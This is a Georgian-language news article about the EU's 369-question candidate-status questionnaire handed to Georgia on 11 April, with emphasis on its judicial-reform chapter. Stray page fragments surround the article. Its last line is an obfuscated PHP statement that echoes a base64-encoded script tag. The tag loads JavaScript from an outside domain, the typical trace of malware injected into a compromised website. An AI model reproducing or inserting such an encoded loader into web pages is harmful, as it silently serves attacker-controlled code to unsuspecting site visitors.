celsiusi
ავერსი შნაიდერი
11 აპრილს ევროკომისარმა ოლივიე ვარჰეიმ საქართველოს საგარეო საქმეთა მინისტრს, ილია დარჩიაშვილს ევროკავშირის კანდიდატი ქვეყნის სტატუსის თვითშეფასების კითხვარი გადასცა. დღეს საქართველოს მთავრობამ გამოაქვეყნა 369 კითხვისგან შემდგარი დოკუმენტი, რომელზე გასაცემ პასუხებზეც დამოკიდებულია საქართველოსთვის EU-ს კანდიდატის სტატუსის მინიჭების საკითხი. 
 
369 კითხვა თავისმხრივ ასობით ქვეკითხვად იყოფა, რომელზეც საქართველოს მთავრობამ ამომწურავი პასუხები უნდა გასცეს. 
 
მათ შორის განსაკუთრებით კრიტიკულია 75-დან 135-მდე კითხვები, რაც მთლიანობაში მერვე, ანუ მართლმსაჯულების სისტემის რეფორმების თავს აერთიანებს. ეს საკითხი მნიშვნელოვანია იმ თვალსაზრისითაც, რომ საქართველოს სასამართლო სისტემაში არსებულ პრობლემებთან და შეყოვნებულ რეფორმებთან მიმართებით თავად EU-ს არაერთხელ აქვს პოზიცია დაფიქსირებული.
 
"ევროკავშირში გაწევრიანების სპეციალური კითხვარის პირველი ნაწილი საქართველოს 11 აპრილს, ლუქსემბურგში გადმოეცა. კითხვარის საფუძველზე ევროკომისია მოამზადებს შეფასების ანგარიშს (Opinion), ქვეყნისათვის კანდიდატის სტატუსის მინიჭებასთან დაკავშირებით.
 
კითხვარი მოიცავს პოლიტიკურ და ეკონომიკურ ნაწილებს, ამასთან, საქართველო უახლოეს პერიოდში მიიღებს კითხვარის მეორე ნაწილს, რომელიც დაეთმობა დარგობრივ თემებს და სექტორების მიხედვით ევროკავშირის კანონმდებლობასთან თავსებადობას,"- აცხადებს მთავრობა.
 
369 კითხვა შეგიძლიათ იხილოთ ბმულზე.
930
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");